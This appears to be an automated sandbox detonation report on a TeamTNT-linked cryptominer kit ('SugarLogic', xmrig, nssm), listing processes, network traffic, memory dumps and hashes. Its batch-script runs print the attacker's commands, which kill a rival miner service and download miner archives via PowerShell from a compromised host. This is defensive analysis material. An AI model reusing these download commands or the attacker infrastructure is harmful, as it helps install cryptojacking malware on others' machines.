C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
xmrig.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 199.247.27.41:3333 | donate.v2.xmrig.com | tcp |
Files
memory/532-55-0x0000000000000000-mapping.dmp
memory/532-56-0x0000000000400000-0x0000000000420000-memory.dmp
memory/532-58-0x00000000004F0000-0x0000000000510000-memory.dmp
memory/532-57-0x0000000000450000-0x0000000000470000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
121s
Max time network
158s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/4012-116-0x0000000000170000-0x0000000000190000-memory.dmp
memory/4012-117-0x00000000001B0000-0x00000000001B4000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20210920
Max time kernel
122s
Max time network
143s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\nssm.exe"
Network
Files
Analysis: behavioral32
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win7-en-20211014
Max time kernel
0s
Max time network
2s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Stops running service(s)
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\where.exe
where sc
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
Network
Files
memory/704-55-0x0000000000000000-mapping.dmp
memory/1500-56-0x0000000000000000-mapping.dmp
memory/1640-57-0x0000000000000000-mapping.dmp
memory/856-58-0x0000000000000000-mapping.dmp
memory/636-59-0x0000000000000000-mapping.dmp
memory/1004-60-0x0000000000000000-mapping.dmp
memory/880-61-0x0000000000000000-mapping.dmp
memory/1368-62-0x0000000000000000-mapping.dmp
memory/740-63-0x0000000000000000-mapping.dmp
memory/1776-64-0x0000000000000000-mapping.dmp
memory/1616-65-0x0000000000000000-mapping.dmp
memory/836-66-0x0000000000000000-mapping.dmp
memory/1564-67-0x0000000000000000-mapping.dmp
memory/1564-68-0x000007FEFB561000-0x000007FEFB563000-memory.dmp
memory/1564-69-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp
memory/1564-70-0x00000000024F0000-0x00000000024F2000-memory.dmp
memory/1564-71-0x00000000024F2000-0x00000000024F4000-memory.dmp
memory/1564-72-0x00000000024F4000-0x00000000024F7000-memory.dmp
memory/2044-73-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 0ef13bd9283ba54cbc47d9baf4601d6d |
| SHA1 | ede1ee9091274f021c8725fbbc376c6d532d6aca |
| SHA256 | 8e2dfa485ac3c31e0c7b3c5254d38376a6e8b8d3ad3f8fa9aad9de9095472929 |
| SHA512 | 42b0b2386012b29f13b7466c1e6289784f6031d251d048eabb4f84a1dee5c0f917ca452db94c51815100a349bf085ecdc379d0314576631409f31550cb141f27 |
memory/2044-78-0x00000000020D0000-0x00000000020D2000-memory.dmp
memory/2044-76-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp
memory/1564-77-0x00000000024FB000-0x000000000251A000-memory.dmp
memory/2044-80-0x00000000020D4000-0x00000000020D7000-memory.dmp
memory/2044-79-0x00000000020D2000-0x00000000020D4000-memory.dmp
memory/2044-81-0x00000000020DB000-0x00000000020FA000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
121s
Max time network
160s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20210920
Max time kernel
122s
Max time network
154s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3044 wrote to memory of 4336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
| PID 3044 wrote to memory of 4336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
xmrig.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 199.247.27.41:3333 | donate.v2.xmrig.com | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/4336-115-0x0000000000000000-mapping.dmp
memory/4336-116-0x000001BE63E60000-0x000001BE63E80000-memory.dmp
memory/4336-117-0x000001BE63F80000-0x000001BE63FA0000-memory.dmp
memory/4336-118-0x000001BE63FB0000-0x000001BE63FD0000-memory.dmp
memory/4336-119-0x000001BE63FD0000-0x000001BE63FF0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20210920
Max time kernel
117s
Max time network
160s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 199.247.27.41:3333 | donate.v2.xmrig.com | tcp |
Files
memory/576-54-0x00000000000F0000-0x0000000000110000-memory.dmp
memory/576-55-0x0000000000390000-0x00000000003B0000-memory.dmp
memory/576-56-0x0000000000690000-0x00000000006B0000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsbe-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/198103836/payload.dat
[/tmp/198103836/payload.dat]
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
118s
Max time network
130s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\nssm\nssm.exe"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsel-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/138283075/payload.dat
[/tmp/138283075/payload.dat]
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win10-en-20211014
Max time kernel
15s
Max time network
23s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.32:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win7-en-20211014
Max time kernel
7s
Max time network
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
122s
Max time network
158s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 52.109.76.30:443 | tcp | |
| US | 8.8.8.8:53 | donate.v2.xmrig.com | udp |
| NL | 178.128.242.134:3333 | donate.v2.xmrig.com | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/3960-118-0x000001D7A4710000-0x000001D7A4730000-memory.dmp
memory/3960-119-0x000001D7A4740000-0x000001D7A4760000-memory.dmp
memory/3960-121-0x000001D7A4790000-0x000001D7A47B0000-memory.dmp
memory/3960-120-0x000001D7A4770000-0x000001D7A4790000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win7-en-20210920
Max time kernel
5s
Max time network
5s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20210920
Max time kernel
118s
Max time network
149s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"
Network
Files
memory/832-54-0x00000000002E0000-0x0000000000300000-memory.dmp
memory/832-55-0x00000000003C0000-0x00000000003C4000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsbe-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/147773066/payload.dat
[/tmp/147773066/payload.dat]
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Stops running service(s)
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
Network
Files
memory/556-55-0x0000000000000000-mapping.dmp
memory/576-56-0x0000000000000000-mapping.dmp
memory/980-57-0x0000000000000000-mapping.dmp
memory/1756-58-0x0000000000000000-mapping.dmp
memory/932-59-0x0000000000000000-mapping.dmp
memory/1768-60-0x0000000000000000-mapping.dmp
memory/300-61-0x0000000000000000-mapping.dmp
memory/592-62-0x0000000000000000-mapping.dmp
memory/1356-63-0x0000000000000000-mapping.dmp
memory/836-64-0x0000000000000000-mapping.dmp
memory/1772-65-0x0000000000000000-mapping.dmp
memory/1752-66-0x0000000000000000-mapping.dmp
memory/1752-67-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp
memory/1752-69-0x0000000002590000-0x0000000002592000-memory.dmp
memory/1752-70-0x0000000002592000-0x0000000002594000-memory.dmp
memory/1752-71-0x0000000002594000-0x0000000002597000-memory.dmp
memory/1752-68-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp
memory/1752-72-0x000000000259B000-0x00000000025BA000-memory.dmp
memory/1848-73-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 79e4c0b77b8b96fda81ae95dfd4ec654 |
| SHA1 | 0c5c5d2367b1c05c1b3993cef2b1056461df04a1 |
| SHA256 | 2b6e568f5e6f02d719fdb9a2d2cb2ba56edaaedee44cf3fbe0be7cced67dbb59 |
| SHA512 | d7f1d7e3501208de6c2549cefd6348e2c4243f01240fba19d2df8ed553a2361d6ecea686679a4f510d81139bc63f52914d63b1fcbc7984d93de2f96539161330 |
memory/1848-76-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp
memory/1848-78-0x0000000002632000-0x0000000002634000-memory.dmp
memory/1848-79-0x0000000002634000-0x0000000002637000-memory.dmp
memory/1848-77-0x0000000002630000-0x0000000002632000-memory.dmp
memory/1848-80-0x000000000263B000-0x000000000265A000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025